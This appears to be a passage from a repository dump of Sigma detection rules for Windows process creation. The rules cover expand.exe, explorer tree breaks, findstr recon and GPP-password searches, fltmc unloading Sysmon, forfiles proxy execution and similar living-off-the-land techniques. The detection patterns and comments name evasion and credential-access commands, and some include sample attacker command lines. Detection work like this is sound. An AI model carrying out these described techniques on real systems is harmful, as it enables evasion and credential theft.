    "content": "title: Potentially Suspicious Cabinet File Expansion\nid: 9f107a84-532c-41af-b005-8d12a607639f\nstatus: test\ndescription: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks\nreferences:\n    - https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll\n    - https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/\nauthor: Bhabesh Raj, X__Junior (Nextron Systems)\ndate: 2021-07-30\nmodified: 2024-11-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd:\n        Image|endswith: '\\expand.exe'\n        CommandLine|contains|windash: '-F:'\n    selection_folders_1:\n        CommandLine|contains:\n            - ':\\Perflogs\\'\n            - ':\\ProgramData'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\Admin$\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n            - '\\C$\\'\n            - '\\Temporary Internet'\n    selection_folders_2:\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n    filter_optional_dell:\n        # Launched by Dell ServiceShell.exe\n        ParentImage: 'C:\\Program Files (x86)\\Dell\\UpdateService\\ServiceShell.exe'\n        CommandLine|contains: 'C:\\ProgramData\\Dell\\UpdateService\\Temp\\'\n    condition: selection_cmd and 1 of selection_folders_* and not 1 of filter_optional_*\nfalsepositives:\n    - System administrator Usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml",
    "content": "title: Explorer Process Tree Break\nid: 949f1ffb-6e85-4f00-ae1e-c3c5b190d605\nstatus: test\ndescription: |\n  Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\n  which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\nreferences:\n    - https://twitter.com/CyberRaiju/status/1273597319322058752\n    - https://twitter.com/bohops/status/1276357235954909188?s=12\n    - https://twitter.com/nas_bench/status/1535322450858233858\n    - https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber\ndate: 2019-06-29\nmodified: 2025-10-31\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Note: See CLSID_SeparateMultipleProcessExplorerHost in the registry for reference\n    selection_factory:\n        CommandLine|contains: '/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}' # This will catch, the new explorer spawning which indicates a process/tree break. But you won't be able to catch the executing process. For that you need historical data\n    selection_root:\n        CommandLine|contains: 'explorer.exe'\n        CommandLine|contains|windash: ' /root,'\n        # There exists almost infinite possibilities to spawn from explorer. The \"/root\" flag is just an example\n        # It's better to have the ability to look at the process tree and look for explorer processes with \"weird\" flags to be able to catch this technique.\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml",
    "content": "title: File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell\nid: c3d76afc-93df-461e-8e67-9b2bad3f2ac4\nstatus: test\ndescription: |\n    Detects the initial execution of \"cmd.exe\" which spawns \"explorer.exe\" with the appropriate command line arguments for opening the \"My Computer\" folder.\nauthor: '@Kostastsale'\nreferences:\n    - https://ss64.com/nt/shell.html\ndate: 2022-12-22\nmodified: 2024-08-23\ntags:\n    - attack.discovery\n    - attack.t1135\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        Image|endswith: '\\explorer.exe'\n        CommandLine|contains: 'shell:mycomputerfolder'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_explorer_nouaccheck.yml",
    "content": "title: Explorer NOUACCHECK Flag\nid: 534f2ef7-e8a2-4433-816d-c91bccde289b\nstatus: test\ndescription: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks\nreferences:\n    - https://twitter.com/ORCA6665/status/1496478087244095491\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-23\nmodified: 2022-04-21\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\explorer.exe'\n        CommandLine|contains: '/NOUACCHECK'\n    filter_dc_logon:\n        - ParentCommandLine: 'C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n        - ParentImage: 'C:\\Windows\\System32\\svchost.exe' # coarse filter needed for ID 4688 Events\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Domain Controller User Logon\n    - Unknown how many legitimate software products use that method\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_download.yml",
    "content": "title: Remote File Download Via Findstr.EXE\nid: 587254ee-a24b-4335-b3cd-065c0f1f4baa\nrelated:\n    - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f\n      type: obsolete\nstatus: test\ndescription: |\n    Detects execution of \"findstr\" with specific flags and a remote share path. This specific set of CLI flags would allow \"findstr\" to download the content of the file located on the remote share as described in the LOLBAS entry.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Findstr/\n    - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nauthor: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-10-05\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.command-and-control\n    - attack.t1218\n    - attack.t1564.004\n    - attack.t1552.001\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_findstr:\n        - CommandLine|contains: findstr\n        - Image|endswith: 'findstr.exe'\n        - OriginalFileName: 'FINDSTR.EXE'\n    selection_cli_download_1:\n        CommandLine|contains|windash: ' -v '\n    selection_cli_download_2:\n        CommandLine|contains|windash: ' -l '\n    selection_cli_download_3:\n        CommandLine|contains: '\\\\\\\\'\n    condition: selection_findstr and all of selection_cli_download_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml",
    "content": "title: Findstr GPP Passwords\nid: 91a2c315-9ee6-4052-a853-6f6a8238f90d\nstatus: test\ndescription: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr\nauthor: frack113\ndate: 2021-12-27\nmodified: 2023-11-11\ntags:\n    - attack.credential-access\n    - attack.t1552.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\find.exe'\n              - '\\findstr.exe'\n        - OriginalFileName:\n              - 'FIND.EXE'\n              - 'FINDSTR.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'cpassword'\n            - '\\sysvol\\'\n            - '.xml'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: GPP Passwords (findstr)\n      technique: T1552.006\n      atomic_guid: 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_lnk.yml",
    "content": "title: Findstr Launching .lnk File\nid: 33339be3-148b-4e16-af56-ad16ec6c7e7b\nstatus: test\ndescription: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack\nreferences:\n    - https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/\nauthor: Trent Liffick\ndate: 2020-05-01\nmodified: 2024-01-15\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1202\n    - attack.t1027.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\find.exe'\n              - '\\findstr.exe'\n        - OriginalFileName:\n              - 'FIND.EXE'\n              - 'FINDSTR.EXE'\n    selection_cli:\n        CommandLine|endswith:\n            - '.lnk'\n            - '.lnk\"'\n            - \".lnk'\"\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_lsass.yml",
    "content": "title: LSASS Process Reconnaissance Via Findstr.EXE\nid: fe63010f-8823-4864-a96b-a7b4a0f7b929\nstatus: test\ndescription: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID\nreferences:\n    - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-12\nmodified: 2024-06-04\ntags:\n    - attack.credential-access\n    - attack.t1552.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_findstr_img:\n        - Image|endswith:\n              - '\\find.exe'\n              - '\\findstr.exe'\n        - OriginalFileName:\n              - 'FIND.EXE'\n              - 'FINDSTR.EXE'\n    selection_findstr_cli:\n        CommandLine|contains: 'lsass'\n    selection_special:\n        CommandLine|contains|windash:\n            - ' /i \"lsass'\n            - ' /i lsass.exe'\n            - 'findstr \"lsass'\n            - 'findstr lsass'\n            - 'findstr.exe \"lsass'\n            - 'findstr.exe lsass'\n    condition: all of selection_findstr_* or selection_special\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_lsass/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml",
    "content": "title: Permission Misconfiguration Reconnaissance Via Findstr.EXE\nid: 47e4bab7-c626-47dc-967b-255608c9a920\nstatus: test\ndescription: |\n    Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords.\n    This was seen being used in combination with \"icacls\" and other utilities to spot misconfigured files or folders permissions.\nreferences:\n    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-12\nmodified: 2023-11-11\ntags:\n    - attack.credential-access\n    - attack.t1552.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_findstr_img:\n        - Image|endswith:\n              - '\\find.exe'\n              - '\\findstr.exe'\n        - OriginalFileName:\n              - 'FIND.EXE'\n              - 'FINDSTR.EXE'\n    selection_findstr_cli:\n        CommandLine|contains:\n            - '\"Everyone\"'\n            - \"'Everyone'\"\n            - '\"BUILTIN\\\\\"'\n            - \"'BUILTIN\\\\'\"\n    selection_special:\n        CommandLine|contains|all:\n            # Example CLI would be: icacls \"C:\\Program Files\\*\" 2>nul | findstr \"(M)\" | findstr \"Everyone\"\n            # You could extend it for other groups and users\n            #   Example: icacls \"C:\\Program Files\\*\" 2>nul | findstr \"(M)\" | findstr \"BUILTIN\\Users\"\n            # Note: This selection only detects the command when executed from a handler such as a \"cmd /c\" or \"powershell -c\"\n            - 'icacls '\n            - 'findstr '\n            - 'Everyone'\n    condition: all of selection_findstr_* or selection_special\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml",
    "content": "title: Recon Command Output Piped To Findstr.EXE\nid: ccb5742c-c248-4982-8c5c-5571b9275ad3\nrelated:\n    - id: fe63010f-8823-4864-a96b-a7b4a0f7b929\n      type: derived\nstatus: test\ndescription: |\n    Detects the execution of a potential recon command where the results are piped to \"findstr\". This is meant to trigger on inline calls of \"cmd.exe\" via the \"/c\" or \"/k\" for example.\n    Attackers often time use this technique to extract specific information they require in their reconnaissance phase.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist\n    - https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf\n    - https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2023-07-06\nmodified: 2025-10-08\ntags:\n    - attack.discovery\n    - attack.t1057\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # Note: Add additional CLI to increase and enhance coverage\n            # Note: We use wildcards in this instance to avoid writing a lot of variations that can be avoided easily. You can switch to regex if its supported by your backend.\n            - 'ipconfig*|*find'\n            - 'net*|*find'\n            - 'netstat*|*find'\n            - 'ping*|*find'\n            - 'systeminfo*|*find'\n            - 'tasklist*|*find'\n            - 'whoami*|*find'\n    filter_optional_xampp:\n        CommandLine|contains|all:\n            - 'cmd.exe /c TASKLIST /V |'\n            - 'FIND /I'\n            - '\\xampp\\'\n            - '\\catalina_start.bat'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml",
    "content": "title: Security Tools Keyword Lookup Via Findstr.EXE\nid: 4fe074b4-b833-4081-8f24-7dcfeca72b42\nrelated:\n    - id: fe63010f-8823-4864-a96b-a7b4a0f7b929\n      type: derived\nstatus: test\ndescription: |\n    Detects execution of \"findstr\" to search for common names of security tools. Attackers often pipe the results of recon commands such as \"tasklist\" or \"whoami\" to \"findstr\" in order to filter out the results.\n    This detection focuses on the keywords that the attacker might use as a filter.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery\n    - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\n    - https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2023-10-20\nmodified: 2023-11-14\ntags:\n    - attack.discovery\n    - attack.t1518.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\find.exe'\n              - '\\findstr.exe'\n        - OriginalFileName:\n              - 'FIND.EXE'\n              - 'FINDSTR.EXE'\n    selection_cli:\n        CommandLine|endswith:\n            # Note: Add additional keywords to increase and enhance coverage\n            # Note:\n            #   We use the double quote variation because in cases of where the command is executed through cmd for example:\n            #       cmd /c \"tasklist | findstr virus\"\n            #   Logging utilties such as Sysmon would capture the end quote as part of findstr execution\n            - ' avira'\n            - ' avira\"'\n            - ' cb'\n            - ' cb\"'\n            - ' cylance'\n            - ' cylance\"'\n            - ' defender'\n            - ' defender\"'\n            - ' kaspersky'\n            - ' kaspersky\"'\n            - ' kes'\n            - ' kes\"'\n            - ' mc'\n            - ' mc\"'\n            - ' sec'\n            - ' sec\"'\n            - ' sentinel'\n            - ' sentinel\"'\n            - ' symantec'\n            - ' symantec\"'\n            - ' virus'\n            - ' virus\"'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Security Software Discovery\n      technique: T1518.001\n      atomic_guid: f92a380f-ced9-491f-b338-95a991418ce2\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_subfolder_search.yml",
    "content": "title: Insensitive Subfolder Search Via Findstr.EXE\nid: 04936b66-3915-43ad-a8e5-809eadfd1141\nrelated:\n    - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f\n      type: obsolete\nstatus: test\ndescription: |\n    Detects execution of findstr with the \"s\" and \"i\" flags for a \"subfolder\" and \"insensitive\" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Findstr/\n    - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nauthor: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-10-05\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.command-and-control\n    - attack.t1218\n    - attack.t1564.004\n    - attack.t1552.001\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_findstr:\n        - CommandLine|contains: findstr\n        - Image|endswith: 'findstr.exe'\n        - OriginalFileName: 'FINDSTR.EXE'\n    selection_cli_search_subfolder:\n        CommandLine|contains|windash: ' -s '\n    selection_cli_search_insensitive:\n        CommandLine|contains|windash: ' -i '\n    condition: selection_findstr and all of selection_cli_search_*\nfalsepositives:\n    - Administrative or software activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml",
    "content": "title: Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE\nid: 37db85d1-b089-490a-a59a-c7b6f984f480\nstatus: test\ndescription: Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service\nauthor: frack113\ndate: 2021-12-16\nmodified: 2023-11-14\ntags:\n    - attack.discovery\n    - attack.t1518.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\find.exe'\n              - '\\findstr.exe'\n        - OriginalFileName:\n              - 'FIND.EXE'\n              - 'FINDSTR.EXE'\n    selection_cli:\n        CommandLine|contains: ' 385201' # Sysmon driver default altitude\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_finger_execution.yml",
    "content": "title: Finger.EXE Execution\nid: af491bca-e752-4b44-9c86-df5680533dbc\nrelated:\n    - id: c082c2b0-525b-4dbc-9a26-a57dc4692074\n      type: similar\n    - id: 2fdaf50b-9fd5-449f-ba69-f17248119af6\n      type: similar\nstatus: test\ndescription: |\n    Detects execution of the \"finger.exe\" utility.\n    Finger.EXE or \"TCPIP Finger Command\" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon.\n    Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of \"finger.exe\" can be considered \"suspicious\" and worth investigating.\nreferences:\n    - https://twitter.com/bigmacjpg/status/1349727699863011328?s=12\n    - https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/\n    - http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt\nauthor: Florian Roth (Nextron Systems), omkar72, oscd.community\ndate: 2021-02-24\nmodified: 2024-06-27\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'finger.exe'\n        - Image|endswith: '\\finger.exe'\n    condition: selection\nfalsepositives:\n    - Admin activity (unclear what they do nowadays with finger.exe)\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_finger_execution/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_fltmc_unload_driver.yml",
    "content": "title: Filter Driver Unloaded Via Fltmc.EXE\nid: 4931188c-178e-4ee7-a348-39e8a7a56821\nrelated:\n    - id: 4d7cda18-1b12-4e52-b45c-d28653210df8 # Sysmon specific\n      type: derived\nstatus: test\ndescription: Detect filter driver unloading activity via fltmc.exe\nreferences:\n    - https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon\n    - https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-13\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1070\n    - attack.t1562\n    - attack.t1562.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\fltMC.exe'\n        - OriginalFileName: 'fltMC.exe'\n    selection_cli:\n        CommandLine|contains: 'unload'\n    filter_optional_avira:\n        ParentImage|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - ':\\Windows\\Temp\\'\n        ParentImage|endswith: '\\endpoint-protection-installer-x64.tmp'\n        CommandLine|endswith:\n            - 'unload rtp_filesystem_filter'\n            - 'unload rtp_filter'\n    filter_optional_manageengine:\n        ParentImage: 'C:\\Program Files (x86)\\ManageEngine\\uems_agent\\bin\\dcfaservice64.exe'\n        CommandLine|endswith: 'unload DFMFilter'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml",
    "content": "title: Sysmon Driver Unloaded Via Fltmc.EXE\nid: 4d7cda18-1b12-4e52-b45c-d28653210df8\nrelated:\n    - id: 4931188c-178e-4ee7-a348-39e8a7a56821 # Generic\n      type: similar\nstatus: test\ndescription: Detects possible Sysmon filter driver unloaded via fltmc.exe\nreferences:\n    - https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon\nauthor: Kirill Kiryanov, oscd.community\ndate: 2019-10-23\nmodified: 2023-02-13\ntags:\n    - attack.defense-evasion\n    - attack.t1070\n    - attack.t1562\n    - attack.t1562.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\fltMC.exe'\n        - OriginalFileName: 'fltMC.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'unload'\n            - 'sysmon'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml",
    "content": "title: Forfiles.EXE Child Process Masquerading\nid: f53714ec-5077-420e-ad20-907ff9bb2958\nstatus: test\ndescription: |\n    Detects the execution of \"forfiles\" from a non-default location, in order to potentially spawn a custom \"cmd.exe\" from the current working directory.\nreferences:\n    - https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/\nauthor: Nasreddine Bencherchali (Nextron Systems), Anish Bogati\ndate: 2024-01-05\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Notes:\n        #   - The parent must not have CLI options\n        #   - The Child Image must be named \"cmd\" as its hardcoded in the \"forfiles\" binary\n        #   - The Child CLI will always contains \"/c echo\" as its hardcoded in the original \"forfiles\" binary\n        ParentCommandLine|endswith:\n            - '.exe'\n            - '.exe\"'\n        Image|endswith: '\\cmd.exe'\n        CommandLine|startswith: '/c echo \"'\n    filter_main_parent_not_sys:\n        ParentImage|contains:\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n        ParentImage|endswith: '\\forfiles.exe'\n        Image|contains:\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n        Image|endswith: '\\cmd.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_forfiles_proxy_execution_.yml",
    "content": "title: Forfiles Command Execution\nid: 9aa5106d-bce3-4b13-86df-3a20f1d5cf0b\nrelated:\n    - id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8\n      type: obsolete\n    - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02\n      type: obsolete\nstatus: test\ndescription: |\n    Detects the execution of \"forfiles\" with the \"/c\" flag.\n    While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.\n    Can be used to bypass application whitelisting.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/\n    - https://pentestlab.blog/2020/07/06/indirect-command-execution/\nauthor: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2022-06-14\nmodified: 2024-03-05\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\forfiles.exe'\n        - OriginalFileName: 'forfiles.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' -c '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use via a batch script or by an administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_format_uncommon_filesystem_load.yml",
    "content": "title: Uncommon FileSystem Load Attempt By Format.com\nid: 9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60\nstatus: test\ndescription: |\n    Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which \"format.com\" is used to load malicious DLL files or other programs.\nreferences:\n    - https://twitter.com/0gtweet/status/1477925112561209344\n    - https://twitter.com/wdormann/status/1478011052130459653?s=20\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-04\nmodified: 2024-05-13\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\format.com'\n        CommandLine|contains: '/fs:'\n    filter_main_known_fs:\n        CommandLine|contains:\n            - '/fs:exFAT'\n            - '/fs:FAT'\n            - '/fs:NTFS'\n            - '/fs:ReFS'\n            - '/fs:UDF'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_fsi_fsharp_code_execution.yml",
    "content": "title: Use of FSharp Interpreters\nid: b96b2031-7c17-4473-afe7-a30ce714db29\nstatus: test\ndescription: |\n    Detects the execution of FSharp Interpreters \"FsiAnyCpu.exe\" and \"FSi.exe\"\n    Both can be used for AWL bypass and to execute F# code via scripts or inline.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac\n    - https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/\nauthor: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io\ndate: 2022-06-02\nmodified: 2024-04-23\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\fsi.exe'\n              - '\\fsianycpu.exe'\n        - OriginalFileName:\n              - 'fsi.exe'\n              - 'fsianycpu.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use by a software developer.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml",
    "content": "title: Fsutil Drive Enumeration\nid: 63de06b9-a385-40b5-8b32-73f2b9ef84b6\nstatus: test\ndescription: Attackers may leverage fsutil to enumerated connected drives.\nreferences:\n    - Turla has used fsutil fsinfo drives to list connected drives.\n    - https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml\nauthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'\ndate: 2022-03-29\nmodified: 2022-07-14\ntags:\n    - attack.discovery\n    - attack.t1120\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\fsutil.exe'\n        - OriginalFileName: 'fsutil.exe'\n    selection_cli:\n        CommandLine|contains: 'drives'\n    condition: all of selection_*\nfalsepositives:\n    - Certain software or administrative tasks may trigger false positives.\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml",
